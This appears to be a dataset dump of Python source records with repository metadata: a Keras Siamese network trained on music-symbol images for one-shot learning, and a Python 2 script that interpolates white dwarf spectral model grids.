for i in range(1, N):
gcd = math.gcd(res, A[i])
res = gcd * (res // gcd) * (A[i] // gcd)
return res
N = ni()
ans = 1
A = []
for i in range(2, N + 1):
A.append(i)
print(lcm(A) + 1) | 144 | 0 | 23 |
58194c56ccba360960350e59665fce422d256866 | 13,281 | py | Python | Siamese.py | sirpuria/DeepScoresExamples | 3b2decb8b295354f7023437144dd0152f1cb8f6a | [
"MIT"
] | null | null | null | Siamese.py | sirpuria/DeepScoresExamples | 3b2decb8b295354f7023437144dd0152f1cb8f6a | [
"MIT"
] | null | null | null | Siamese.py | sirpuria/DeepScoresExamples | 3b2decb8b295354f7023437144dd0152f1cb8f6a | [
"MIT"
] | null | null | null |
import argparse
import sys, os
import imageio
import tensorflow as tf
import Classification_BatchDataset
import TensorflowUtils as utils
import pickle
import time
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Conv2D, MaxPool2D, Dropout, Flatten, Dense, Input, Lambda
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import Accuracy
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import regularizers
from tensorflow.keras.regularizers import l2
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from sklearn.utils import shuffle
import numpy as np
import numpy.random as rng
FLAGS = None
def loadimgs(path,n = 0):
'''
path => Path of train directory or test directory
'''
X=[]
y = []
cat_dict = {}
lang_dict = {}
curr_y = n
# we load every alphabet seperately so we can isolate them later
for alphabet in os.listdir(path):
print("loading alphabet: " + alphabet)
lang_dict[alphabet] = [curr_y,None]
alphabet_path = os.path.join(path,alphabet)
# every letter/category has it's own column in the array, so load seperately
for letter in os.listdir(alphabet_path):
cat_dict[curr_y] = (alphabet, letter)
category_images=[]
letter_path = os.path.join(alphabet_path, letter)
# read all the images in the current category
dirlist = os.listdir(letter_path)
if len(dirlist)>1:
for filename in dirlist:
image_path = os.path.join(letter_path, filename)
image = imageio.imread(image_path)
category_images.append(image)
# print(len(category_images))
y.append(curr_y)
try:
uu = np.stack(category_images)
X.append(uu)
# edge case - last one
except ValueError as e:
print(e)
print("error - category_images:", category_images)
print(letter)
curr_y += 1
lang_dict[alphabet][1] = curr_y - 1
y = np.vstack(y)
X = np.stack(X)
return X,y,lang_dict
# def initialize_weights(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer weights with mean as 0.0 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.0, stddev = 0.01)
#
# def initialize_bias(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer bias with mean as 0.5 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.5, stddev = 0.01)
def get_siamese_model(input_shape):
"""
Model architecture based on the one provided in: http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
"""
# Define the tensors for the two input images
left_input = Input(input_shape)
right_input = Input(input_shape)
initialize_weights = tf.keras.initializers.RandomNormal(mean=0., stddev=0.01)
initialize_bias = tf.keras.initializers.RandomNormal(mean=0.5, stddev=0.01)
# Convolutional Neural Network
model = Sequential([
Conv2D(64, (10,10), activation='relu', input_shape=input_shape,
kernel_initializer=initialize_weights, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(128, (7,7), activation='relu',
kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(128, (4,4), activation='relu', kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(256, (4,4), activation='relu', kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
Flatten(),
Dense(4096, activation='sigmoid',
kernel_regularizer=l2(1e-3),
kernel_initializer=initialize_weights,bias_initializer=initialize_bias)
])
# Generate the encodings (feature vectors) for the two images
encoded_l = model(left_input)
encoded_r = model(right_input)
# Add a customized layer to compute the absolute difference between the encodings
L1_layer = Lambda(lambda tensors:tf.math.abs(tensors[0] - tensors[1]))
L1_distance = L1_layer([encoded_l, encoded_r])
# Add a dense layer with a sigmoid unit to generate the similarity score
prediction = Dense(1,activation='sigmoid',bias_initializer=initialize_bias)(L1_distance)
# Connect the inputs with the outputs
siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)
# return the model
return siamese_net
def get_batch(batch_size,s="train"):
"""Create batch of n pairs, half same class, half different class"""
if s == 'train':
X = Xtrain
categories = train_classes
else:
X = Xval
categories = val_classes
n_classes, n_examples, h, w = X.shape
# randomly sample several classes to use in the batch
categories = rng.choice(n_classes,size=(batch_size,),replace=False)
# initialize 2 empty arrays for the input image batch
pairs=[np.zeros((batch_size, h, w,1)) for i in range(2)]
# initialize vector for the targets
targets=np.zeros((batch_size,))
# make one half of it '1's, so 2nd half of batch has same class
targets[batch_size//2:] = 1
for i in range(batch_size):
category = categories[i]
idx_1 = rng.randint(0, n_examples)
pairs[0][i,:,:,:] = X[category, idx_1].reshape(h, w, 1)
idx_2 = rng.randint(0, n_examples)
# pick images of same class for 1st half, different for 2nd
if i >= batch_size // 2:
category_2 = category
else:
# add a random number to the category modulo n classes to ensure 2nd image has a different category
category_2 = (category + rng.randint(1,n_classes)) % n_classes
pairs[1][i,:,:,:] = X[category_2,idx_2].reshape(h, w,1)
return pairs, targets
def generate(batch_size, s="train"):
"""a generator for batches, so model.fit_generator can be used. """
while True:
pairs, targets = get_batch(batch_size,s)
yield (pairs, targets)
def make_oneshot_task(N, s="val", language=None):
"""Create pairs of test image, support set for testing N way one-shot learning. """
if s == 'train':
X = Xtrain
categories = train_classes
elif s == 'val':
X = Xval
categories = val_classes
else :
X = Xtest2
categories = test2_classes
n_classes, n_examples,h, w = X.shape
indices = rng.randint(0, n_examples,size=(N,))
if language is not None: # if language is specified, select characters for that language
low, high = categories[language]
if N > high - low:
raise ValueError("This language ({}) has less than {} letters".format(language, N))
categories = rng.choice(range(low,high),size=(N,),replace=False)
else: # if no language specified just pick a bunch of random letters
categories = rng.choice(range(n_classes),size=(N,),replace=False)
true_category = categories[0]
ex1, ex2 = rng.choice(n_examples,replace=False,size=(2,))
test_image = np.asarray([X[true_category,ex1,:,:]]*N).reshape(N, h,w,1)
support_set = X[categories,indices,:,:]
support_set[0,:,:] = X[true_category,ex2]
support_set = support_set.reshape(N, h, w,1)
targets = np.zeros((N,))
targets[0] = 1
targets, test_image, support_set = shuffle(targets, test_image, support_set)
pairs = [test_image,support_set]
return pairs, targets
def test_oneshot(model, N, k, s = "val", verbose = 0):
"""Test average N way oneshot learning accuracy of a siamese neural net over k one-shot tasks"""
n_correct = 0
if verbose:
print("Evaluating model on {} random {} way one-shot learning tasks from {} ... \n".format(k,N, s))
for i in range(k):
inputs, targets = make_oneshot_task(N,s)
probs = model.predict(inputs)
if np.argmax(probs) == np.argmax(targets):
n_correct+=1
# else:
# print(targets[np.argmax(targets)])
percent_correct = (100.0 * n_correct / k)
if verbose:
print("Got an average of {}% {} way one-shot learning accuracy \n".format(percent_correct,N))
return percent_correct
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='dataset',
help='Directory for storing input data')
parser.add_argument('--batch_size', type=int,
default=128)
parser.add_argument('--epochs', type=int,
default=50)
parser.add_argument('--steps', type=int,
default=1000)
parser.add_argument('-n', default=100, type=int)
FLAGS, unparsed = parser.parse_known_args()
dataset_dir = FLAGS.data_dir
batch_size=FLAGS.batch_size
nperclass = 100
epochs=FLAGS.epochs
steps = FLAGS.steps
# mode=FLAGS.mode
train_dir = os.path.join(dataset_dir, 'train')
validation_dir = os.path.join(dataset_dir, 'validate')
intrain_test_dir = os.path.join(dataset_dir, 'test2')
# classes= os.listdir(train_dir)
model = get_siamese_model((220, 120, 1))
model.summary()
optimizer = Adam(learning_rate=0.00006)
model.compile(loss="binary_crossentropy",optimizer=optimizer)
X,y,c = loadimgs(train_dir)
with open(os.path.join(dataset_dir,"train.pickle"), "wb") as f:
pickle.dump((X,c),f)
Xval,yval,cval=loadimgs(validation_dir)
with open(os.path.join(dataset_dir,"val.pickle"), "wb") as f:
pickle.dump((Xval,cval),f)
Xtest2,ytest2,ctest2=loadimgs(intrain_test_dir)
with open(os.path.join(dataset_dir,"test2.pickle"), "wb") as f:
pickle.dump((Xtest2,ctest2),f)
with open(os.path.join(dataset_dir, "train.pickle"), "rb") as f:
(Xtrain, train_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "val.pickle"), "rb") as f:
(Xval, val_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "test2.pickle"), "rb") as f:
(Xtest2, test2_classes) = pickle.load(f)
evaluate_every = 1 # interval for evaluating on one-shot tasks
n_iter = 7500 # No. of training iterations
N_way = 18 # how many classes for testing one-shot tasks
n_val = 200 # how many one-shot tasks to validate on
best = -1
print("Starting training process!")
print("-------------------------------------")
t_start = time.time()
history = model.fit(generate(batch_size, "train"), steps_per_epoch=steps, epochs=epochs, callbacks=[CustomCallback()])
print(history)
# for i in range(1, n_iter+1):
# (inputs,targets) = get_batch(batch_size)
# loss = model.train_on_batch(inputs, targets)
# if i % evaluate_every == 0:
# print("\n ------------- \n")
# print("Time for {0} iterations: {1} mins".format(i, (time.time()-t_start)/60.0))
# print("Train Loss: {0}".format(loss))
# val_acc = test_oneshot(model, N_way, n_val, verbose=True)
# model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(i)))
# if val_acc >= best:
# print("Current best: {0}, previous best: {1}".format(val_acc, best))
# best = val_acc
| 36.687845 | 122 | 0.629847 |
import argparse
import sys, os
import imageio
import tensorflow as tf
import Classification_BatchDataset
import TensorflowUtils as utils
import pickle
import time
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Conv2D, MaxPool2D, Dropout, Flatten, Dense, Input, Lambda
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import Accuracy
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import regularizers
from tensorflow.keras.regularizers import l2
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from sklearn.utils import shuffle
import numpy as np
import numpy.random as rng
FLAGS = None
def loadimgs(path,n = 0):
'''
path => Path of train directory or test directory
'''
X=[]
y = []
cat_dict = {}
lang_dict = {}
curr_y = n
# we load every alphabet seperately so we can isolate them later
for alphabet in os.listdir(path):
print("loading alphabet: " + alphabet)
lang_dict[alphabet] = [curr_y,None]
alphabet_path = os.path.join(path,alphabet)
# every letter/category has it's own column in the array, so load seperately
for letter in os.listdir(alphabet_path):
cat_dict[curr_y] = (alphabet, letter)
category_images=[]
letter_path = os.path.join(alphabet_path, letter)
# read all the images in the current category
dirlist = os.listdir(letter_path)
if len(dirlist)>1:
for filename in dirlist:
image_path = os.path.join(letter_path, filename)
image = imageio.imread(image_path)
category_images.append(image)
# print(len(category_images))
y.append(curr_y)
try:
uu = np.stack(category_images)
X.append(uu)
# edge case - last one
except ValueError as e:
print(e)
print("error - category_images:", category_images)
print(letter)
curr_y += 1
lang_dict[alphabet][1] = curr_y - 1
y = np.vstack(y)
X = np.stack(X)
return X,y,lang_dict
# def initialize_weights(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer weights with mean as 0.0 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.0, stddev = 0.01)
#
# def initialize_bias(shape, name=None):
# """
# The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
# suggests to initialize CNN layer bias with mean as 0.5 and standard deviation of 0.01
# """
# return tf.random.normal(shape, mean = 0.5, stddev = 0.01)
def get_siamese_model(input_shape):
"""
Model architecture based on the one provided in: http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf
"""
# Define the tensors for the two input images
left_input = Input(input_shape)
right_input = Input(input_shape)
initialize_weights = tf.keras.initializers.RandomNormal(mean=0., stddev=0.01)
initialize_bias = tf.keras.initializers.RandomNormal(mean=0.5, stddev=0.01)
# Convolutional Neural Network
model = Sequential([
Conv2D(64, (10,10), activation='relu', input_shape=input_shape,
kernel_initializer=initialize_weights, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(128, (7,7), activation='relu',
kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(128, (4,4), activation='relu', kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
MaxPool2D(),
Conv2D(256, (4,4), activation='relu', kernel_initializer=initialize_weights,
bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)),
Flatten(),
Dense(4096, activation='sigmoid',
kernel_regularizer=l2(1e-3),
kernel_initializer=initialize_weights,bias_initializer=initialize_bias)
])
# Generate the encodings (feature vectors) for the two images
encoded_l = model(left_input)
encoded_r = model(right_input)
# Add a customized layer to compute the absolute difference between the encodings
L1_layer = Lambda(lambda tensors:tf.math.abs(tensors[0] - tensors[1]))
L1_distance = L1_layer([encoded_l, encoded_r])
# Add a dense layer with a sigmoid unit to generate the similarity score
prediction = Dense(1,activation='sigmoid',bias_initializer=initialize_bias)(L1_distance)
# Connect the inputs with the outputs
siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)
# return the model
return siamese_net
def get_batch(batch_size,s="train"):
"""Create batch of n pairs, half same class, half different class"""
if s == 'train':
X = Xtrain
categories = train_classes
else:
X = Xval
categories = val_classes
n_classes, n_examples, h, w = X.shape
# randomly sample several classes to use in the batch
categories = rng.choice(n_classes,size=(batch_size,),replace=False)
# initialize 2 empty arrays for the input image batch
pairs=[np.zeros((batch_size, h, w,1)) for i in range(2)]
# initialize vector for the targets
targets=np.zeros((batch_size,))
# make one half of it '1's, so 2nd half of batch has same class
targets[batch_size//2:] = 1
for i in range(batch_size):
category = categories[i]
idx_1 = rng.randint(0, n_examples)
pairs[0][i,:,:,:] = X[category, idx_1].reshape(h, w, 1)
idx_2 = rng.randint(0, n_examples)
# pick images of same class for 1st half, different for 2nd
if i >= batch_size // 2:
category_2 = category
else:
# add a random number to the category modulo n classes to ensure 2nd image has a different category
category_2 = (category + rng.randint(1,n_classes)) % n_classes
pairs[1][i,:,:,:] = X[category_2,idx_2].reshape(h, w,1)
return pairs, targets
def generate(batch_size, s="train"):
"""a generator for batches, so model.fit_generator can be used. """
while True:
pairs, targets = get_batch(batch_size,s)
yield (pairs, targets)
def make_oneshot_task(N, s="val", language=None):
"""Create pairs of test image, support set for testing N way one-shot learning. """
if s == 'train':
X = Xtrain
categories = train_classes
elif s == 'val':
X = Xval
categories = val_classes
else :
X = Xtest2
categories = test2_classes
n_classes, n_examples,h, w = X.shape
indices = rng.randint(0, n_examples,size=(N,))
if language is not None: # if language is specified, select characters for that language
low, high = categories[language]
if N > high - low:
raise ValueError("This language ({}) has less than {} letters".format(language, N))
categories = rng.choice(range(low,high),size=(N,),replace=False)
else: # if no language specified just pick a bunch of random letters
categories = rng.choice(range(n_classes),size=(N,),replace=False)
true_category = categories[0]
ex1, ex2 = rng.choice(n_examples,replace=False,size=(2,))
test_image = np.asarray([X[true_category,ex1,:,:]]*N).reshape(N, h,w,1)
support_set = X[categories,indices,:,:]
support_set[0,:,:] = X[true_category,ex2]
support_set = support_set.reshape(N, h, w,1)
targets = np.zeros((N,))
targets[0] = 1
targets, test_image, support_set = shuffle(targets, test_image, support_set)
pairs = [test_image,support_set]
return pairs, targets
def test_oneshot(model, N, k, s = "val", verbose = 0):
"""Test average N way oneshot learning accuracy of a siamese neural net over k one-shot tasks"""
n_correct = 0
if verbose:
print("Evaluating model on {} random {} way one-shot learning tasks from {} ... \n".format(k,N, s))
for i in range(k):
inputs, targets = make_oneshot_task(N,s)
probs = model.predict(inputs)
if np.argmax(probs) == np.argmax(targets):
n_correct+=1
# else:
# print(targets[np.argmax(targets)])
percent_correct = (100.0 * n_correct / k)
if verbose:
print("Got an average of {}% {} way one-shot learning accuracy \n".format(percent_correct,N))
return percent_correct
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='dataset',
help='Directory for storing input data')
parser.add_argument('--batch_size', type=int,
default=128)
parser.add_argument('--epochs', type=int,
default=50)
parser.add_argument('--steps', type=int,
default=1000)
parser.add_argument('-n', default=100, type=int)
FLAGS, unparsed = parser.parse_known_args()
dataset_dir = FLAGS.data_dir
batch_size=FLAGS.batch_size
nperclass = 100
epochs=FLAGS.epochs
steps = FLAGS.steps
# mode=FLAGS.mode
train_dir = os.path.join(dataset_dir, 'train')
validation_dir = os.path.join(dataset_dir, 'validate')
intrain_test_dir = os.path.join(dataset_dir, 'test2')
# classes= os.listdir(train_dir)
model = get_siamese_model((220, 120, 1))
model.summary()
optimizer = Adam(learning_rate=0.00006)
model.compile(loss="binary_crossentropy",optimizer=optimizer)
X,y,c = loadimgs(train_dir)
with open(os.path.join(dataset_dir,"train.pickle"), "wb") as f:
pickle.dump((X,c),f)
Xval,yval,cval=loadimgs(validation_dir)
with open(os.path.join(dataset_dir,"val.pickle"), "wb") as f:
pickle.dump((Xval,cval),f)
Xtest2,ytest2,ctest2=loadimgs(intrain_test_dir)
with open(os.path.join(dataset_dir,"test2.pickle"), "wb") as f:
pickle.dump((Xtest2,ctest2),f)
with open(os.path.join(dataset_dir, "train.pickle"), "rb") as f:
(Xtrain, train_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "val.pickle"), "rb") as f:
(Xval, val_classes) = pickle.load(f)
with open(os.path.join(dataset_dir, "test2.pickle"), "rb") as f:
(Xtest2, test2_classes) = pickle.load(f)
evaluate_every = 1 # interval for evaluating on one-shot tasks
n_iter = 7500 # No. of training iterations
N_way = 18 # how many classes for testing one-shot tasks
n_val = 200 # how many one-shot tasks to validate on
best = -1
print("Starting training process!")
print("-------------------------------------")
t_start = time.time()
class CustomCallback(Callback):
def __init__(self ):
super(CustomCallback, self).__init__()
self.best = -1
def on_epoch_end(self, epoch, logs=None):
n1 = val_classes['musical'][1]+1
keys = list(logs.keys())
print("End epoch {} of training; got log keys: {}".format(epoch, keys))
val_acc = test_oneshot(model, n1, n_val, verbose=True)
print("Accuracy for validation epoch {} is: {}".format(epoch, val_acc))
if val_acc>=self.best:
self.best = val_acc
model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(epoch)))
nt2 = test2_classes['musical'][1]+1
test2_acc = test_oneshot(model, nt2, n_val, s="test2", verbose=True)
print("Accuracy for Test 2 epoch {} is: {}".format(epoch, test2_acc))
def on_train_end(self, epoch, logs=None):
n1 = val_classes['musical'][1]+1
n2 = test2_classes['musical'][1]+1
test1_acc = test_oneshot(model, n1, n_val, verbose=True)
print(test1_acc)
test2_acc = test_oneshot(model, n2, n_val, s="test2", verbose=True)
print(test2_acc)
model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(epoch)))
history = model.fit(generate(batch_size, "train"), steps_per_epoch=steps, epochs=epochs, callbacks=[CustomCallback()])
print(history)
# for i in range(1, n_iter+1):
# (inputs,targets) = get_batch(batch_size)
# loss = model.train_on_batch(inputs, targets)
# if i % evaluate_every == 0:
# print("\n ------------- \n")
# print("Time for {0} iterations: {1} mins".format(i, (time.time()-t_start)/60.0))
# print("Train Loss: {0}".format(loss))
# val_acc = test_oneshot(model, N_way, n_val, verbose=True)
# model.save_weights(os.path.join(dataset_dir, 'weights.{}.h5'.format(i)))
# if val_acc >= best:
# print("Current best: {0}, previous best: {1}".format(val_acc, best))
# best = val_acc
| 1,213 | 10 | 119 |
52225cc25eab7726008dbc5016cfc8bf8bddd487 | 10,631 | py | Python | intmodels.py | joshfuchs/ZZCeti_fitting | 869c9c260fc11d0a31b00b966af0749006f2d5d5 | [
"MIT"
] | 1 | 2016-12-13T23:36:04.000Z | 2016-12-13T23:36:04.000Z | intmodels.py | joshfuchs/ZZCeti_fitting | 869c9c260fc11d0a31b00b966af0749006f2d5d5 | [
"MIT"
] | null | null | null | intmodels.py | joshfuchs/ZZCeti_fitting | 869c9c260fc11d0a31b00b966af0749006f2d5d5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created March 2015 by JT Fuchs, UNC.
This program interpolates grids of models. It is called by finegrid.py, which contains all the necessary options. Unless you want to change which wavelengths to keep, you shouldn't need to change things here. But keep in mind that interpolation is tricky, you should look at the results carefully.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.interpolate import RectBivariateSpline
import os
import datetime
| 41.527344 | 297 | 0.617628 | # -*- coding: utf-8 -*-
"""
Created March 2015 by JT Fuchs, UNC.
This program interpolates grids of models. It is called by finegrid.py, which contains all the necessary options. Unless you want to change which wavelengths to keep, you shouldn't need to change things here. But keep in mind that interpolation is tricky, you should look at the results carefully.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.interpolate import RectBivariateSpline
import os
import datetime
def models(filenames,grid,case,bestt,bestg):
print 'Starting to run intmodels.py'
#Read in model. There are 33 lines of header information before the data starts
# We do not have to integrate over mu because these files already have
tuse = bestt-2500
guse = bestg-25
#newpath = '/srv/two/jtfuchs/Interpolated_Models/Koester_ML2alpha08/bottom' + str(tuse) + '_' + str(guse)
newpath = '/srv/two/jtfuchs/Interpolated_Models/Koester_ML2alpha08/bottom10000_700'
if case == 0:
os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/Koester_08/')
if case == 1:
#newpath = '/srv/two/jtfuchs/Interpolated_Models/10teff05logg/center' + str(bestt) + '_' + str(bestg)
os.chdir(newpath)
#os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/DA_models/Interpolated_Models/')
#Do a cubic spline interpolation to interpolate the model to even wavelength
#points at 0.1A intervals so the model can be convolved.
#Low and high wavelengths need to be 18A more than desired range
#Set lambda range from ~3650 to 6770
#The Balmer jump in the models makes the spline bulge to its left
#So start to the right of it
#Interpolate the model spectrum at 0.1 A intervals. But interp1d does not have
#a range option, so we will only feed in the portion of the spectrum we want
#to interpolate to speed things up. Again we will go a little beyond the region
#we care about to minimize edge effects of the interpolation. Will use ~3600
#to 6760
intlambda = np.divide(range(31100),10.) + 3660.0
if case == 0:
'''
filename1 = filenames[0]
filename2 = filenames[1]
filename3 = filenames[2]
#filename4 = filenames[3]
#filename5 = filenames[4]
lambdas1, inten1 = np.genfromtxt(filename1,skip_header=33,unpack=True)
lambdas2, inten2 = np.genfromtxt(filename2,skip_header=33,unpack=True)
lambdas3, inten3 = np.genfromtxt(filename3,skip_header=33,unpack=True)
#lambdas4, inten4 = np.genfromtxt(filename4,skip_header=33,unpack=True)
#lambdas5, inten5 = np.genfromtxt(filename5,skip_header=33,unpack=True)
logg1 = float(filename1[8:11])/100.
logg2 = float(filename2[8:11])/100.
logg3 = float(filename3[8:11])/100.
#logg4 = float(filename4[8:11])/100.
#logg5 = float(filename5[8:11])/100.
teff = str(filename1[2:7])
'''
lambdas = np.zeros([len(filenames),31100])
inten = np.zeros([len(filenames),31100])
fluxes = np.zeros([len(filenames),31100])
logg = np.zeros(len(filenames))
teff = str(filenames[0][2:7])
for n in np.arange(len(filenames)):
alllambda, allinten = np.genfromtxt(filenames[n],skip_header=33,unpack=True)
lowlambda = np.min(np.where(alllambda > 3600.))
highlambda = np.min(np.where(alllambda > 6800.))
shortlambdas = alllambda[lowlambda:highlambda]
shortinten = allinten[lowlambda:highlambda]
interp = InterpolatedUnivariateSpline(shortlambdas,shortinten,k=1)
fluxes[n,:] = interp(intlambda)
#lambdas[n,:] , inten[n,:] = np.genfromtxt(filenames[n],unpack=True)
logg[n] = float(filenames[n][8:11])/100.
if case ==1:
'''
filename1 = filenames[0]
filename2 = filenames[1]
filename3 = filenames[2]
filename4 = filenames[3]
filename5 = filenames[4]
lambdas1, inten1 = np.genfromtxt(filename1,unpack=True) #These are the
lambdas2, inten2 = np.genfromtxt(filename2,unpack=True) #models we have
lambdas3, inten3 = np.genfromtxt(filename3,unpack=True) #interpolated.
lambdas4, inten4 = np.genfromtxt(filename4,unpack=True)
lambdas5, inten5 = np.genfromtxt(filename5,unpack=True)
teff1 = float(filename1[2:7])
teff2 = float(filename2[2:7])
teff3 = float(filename3[2:7])
teff4 = float(filename4[2:7])
teff5 = float(filename5[2:7])
logg = str(filename1[8:12])
'''
lambdas = np.zeros([len(filenames),31100])
inten = np.zeros([len(filenames),31100])
teff = np.zeros(len(filenames))
logg = str(filenames[0][8:12])
for n in np.arange(len(filenames)):
lambdas[n,:] , inten[n,:] = np.genfromtxt(filenames[n],unpack=True)
teff[n] = float(filenames[n][2:7])
#print teff
plt.clf()
'''
if case == 0: #600:4300
lowlambda1 = np.min(np.where(lambdas1 > 3600.))
highlambda1 = np.min(np.where(lambdas1 > 6800.))
shortlambdas1 = lambdas1[lowlambda1:highlambda1]
shortinten1 = inten1[lowlambda1:highlambda1]
lowlambda2 = np.min(np.where(lambdas2 > 3600.))
highlambda2 = np.min(np.where(lambdas2 > 6800.))
shortlambdas2 = lambdas2[lowlambda2:highlambda2]
shortinten2 = inten2[lowlambda2:highlambda2]
lowlambda3 = np.min(np.where(lambdas3 > 3600.))
highlambda3 = np.min(np.where(lambdas3 > 6800.))
shortlambdas3 = lambdas3[lowlambda3:highlambda3]
shortinten3 = inten3[lowlambda3:highlambda3]
lowlambda4 = np.min(np.where(lambdas4 > 3600.))
highlambda4 = np.min(np.where(lambdas4 > 6800.))
shortlambdas4 = lambdas4[lowlambda4:highlambda4]
shortinten4 = inten4[lowlambda4:highlambda4]
lowlambda5 = np.min(np.where(lambdas5 > 3600.))
highlambda5 = np.min(np.where(lambdas5 > 6800.))
shortlambdas5 = lambdas5[lowlambda5:highlambda5]
shortinten5 = inten5[lowlambda5:highlambda5]
'''
#print 'shortlambdas1 run from ',shortlambdas1[0], '',shortlambdas1[-1]
#print 'shortlambdas2 run from ',shortlambdas2[0], '',shortlambdas2[-1]
#print 'shortlambdas3 run from ',shortlambdas3[0], '',shortlambdas3[-1]
#print 'shortlambdas4 run from ',shortlambdas4[0], '',shortlambdas4[-1]
#print 'shortlambdas5 run from ',shortlambdas5[0], '',shortlambdas5[-1]
if case == 1:
'''
interp = InterpolatedUnivariateSpline(shortlambdas1,shortinten1,k=1)
intflux = interp(intlambda)
interp2 = InterpolatedUnivariateSpline(shortlambdas2,shortinten2,k=1)
intflux2 = interp2(intlambda)
interp3 = InterpolatedUnivariateSpline(shortlambdas3,shortinten3,k=1)
intflux3 = interp3(intlambda)
interp4 = InterpolatedUnivariateSpline(shortlambdas4,shortinten4,k=1)
intflux4 = interp4(intlambda)
interp5 = InterpolatedUnivariateSpline(shortlambdas5,shortinten5,k=1)
intflux5 = interp5(intlambda)
'''
fluxes = np.zeros([len(filenames),31100])
for n in np.arange(len(filenames)):
interp = InterpolatedUnivariateSpline(lambdas[n,:],inten[n,:],k=1)
fluxes[n,:] = interp(intlambda)
#plot the interpolated spectra
#plt.plot(intlambda,intflux,'ro',label='7.0')
#plt.plot(intlambda,intflux2,'b^',label='7.25')
#plt.plot(intlambda,intflux3,'m*',label='7.5')
#plt.plot(intlambda,intflux4,'gs',label='8.25')
#plt.plot(intlambda,intflux5,'cp',label='8.5')
#plt.show()
#Now do the 2D interpolation
if case == 0:
xval = logg
#xval = np.array([logg1,logg2,logg3,logg4,logg5]) #This is our x
#fluxes = np.array([intflux,intflux2,intflux3])#This is our z
if case == 1:
xval = teff
# xval = np.array([teff1,teff2,teff3,teff4,teff5]) #This is our x
# fluxes = np.array([intflux,intflux2,intflux3,intflux4,intflux5]) #This is our z
#intlambda is our y
print 'Starting 2D interpolation'
#print xval
out = RectBivariateSpline(xval,intlambda,fluxes,kx=1,ky=1,s=0)
print 'Done with the 2D interpolation. Starting to read off new values.'
#Iterate over the output to build an array with the new fluxes
#Need to set up an array that is of size grid by intlambda
intfluxes = []
for x in grid:
#print x
for i in intlambda:
new = float(out([x],[i]))
if i == 3660:
newflux = [new]
else:
newflux.append(new)
intfluxes.append(newflux)
#if x == 10410:
# plt.clf()
# plt.plot(intlambda,newflux,'r^',label='Interp')
# #plt.show()
# #plt.clf()
# plt.plot(lambdas[4,:], inten[4,:],'bs',label='Model')
# plt.legend()
# plt.show()
#if case == 1:
# plt.clf()
# plt.plot(intlambda,intfluxes[39],'b',label='Interp - 8.2')
# plt.plot(intlambda,intfluxes[40],'r',label='Interp - 7.85')
# plt.plot(intlambda,intfluxes[41],'g')
# plt.plot(intlambda,intfluxes[42],'c,')
# #plt.legend()
# plt.show()
#Write and save files
print 'Starting to save files.'
os.chdir(newpath)
if case == 0:
newg = np.multiply(grid,1000.)
n = 0
for x in newg:
thisg = str(x)
thisg = thisg[:-2]
newfile = 'da' + str(teff) + '_' + thisg + '.jf'
np.savetxt(newfile,np.transpose([intlambda,intfluxes[n]]))
#Write out last file saved and time
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
f = open('lastsaved.txt','a')
f.write(newfile + ',' + now + '\n')
f.close()
n += 1
if case ==1:
n = 0
for x in grid:
thist = str(x)
thist = thist[:-2]
newfile = 'da' + thist + '_' + logg + '.jf'
np.savetxt(newfile,np.transpose([intlambda,intfluxes[n]]))
#Write out last file saved and time
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
f = open('lastsaved.txt','a')
f.write(newfile + ',' + now + '\n')
f.close()
n += 1
| 10,042 | 0 | 33 |
